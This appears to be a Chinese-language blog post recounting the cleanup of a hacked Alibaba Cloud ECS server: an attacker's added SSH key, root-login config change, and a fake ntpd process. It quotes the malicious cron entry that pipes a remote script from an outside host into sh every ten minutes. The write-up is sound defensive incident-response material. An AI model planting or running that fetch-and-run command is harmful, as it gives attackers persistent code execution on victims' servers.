阿里雲ECS被黑後的處理-之-清除掛馬

一天發現服務器很卡,還有一些服務莫名的掛掉了,ssh不能通過key登陸,需要密碼。感覺有問題,進入系統,查看定時任務發現一個可以的plan。*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh。於是瀏覽器輸入該網址的到了一個腳本。而後開啓了定點清除任務。


1.查看.ssh目錄內容,檢查一下自己的key。如圖多了幾個文件。可以打開看看

    

    wKioL1eYP-2yRN6XAACtfl4ASeM008.png-wh_50

查看一下計劃任務。


wKioL1eYQFGR9fpsAAAbfesKqsU099.png-wh_50

*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh


2.打開crontab 發現一個uri,用瀏覽器打開看看,是一個腳本,下載下來看看先。



    wKiom1eYQTWSgC48AAC1WArTgYI401.png-wh_50

3.有了這個腳本就容易多了,先看看***都幹了什麼,然後照着還原回去就行了。看圖

    可以看到,他把自己的key加進來,並在ssh的配置文件裏修改指向了自己key文件,

    並允許root用戶登陸,安裝了一個不知道的什麼東東,並冒充ntpd啓動了。


    wKioL1eYQdGBY4zcAAImAq5nzfk756.png-wh_50


4.如圖,該刪的刪,


    wKiom1eYQ2fh8i9CAAFu-lcxSpc751.png-wh_50


5.查看進程,發現了一個冒充時間服務器的ntp進程,,停掉,順便也把啓動腳本也幹掉


    wKioL1eYRHPiCw_1AAA_kS9-R8k303.png-wh_50


    wKioL1eYRIijIkggAAHdNoEhFAM301.png-wh_50


    wKiom1eYRKCB4RxxAAE07SD9kfI474.png-wh_50

就是一個啓動腳本居然還有日誌,做的跟真的是的??????,有興趣可以打開看看。


wKiom1eYRNizQDMAAABj9J6AxNU310.png-wh_50


先停掉再說


wKiom1eYRSTw5mKsAAJDL1RoROY034.png-wh_50


6.主進程也得幹掉,這是最重要的,幹掉後服務器瞬間恢復了,反應和以前一樣塊了,


    

wKiom1eYRdDzSKq4AAIi02B30PQ467.png-wh_50



wKioL1eYRdKhx0adAAR8_I24F7Q703.png-wh_50


7.最後防火牆一定要開啊。


    wKioL1eYRg_DIg-nAACtKdzledw752.png-wh_50


有什麼漏掉的歡迎大家留言指教



    

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章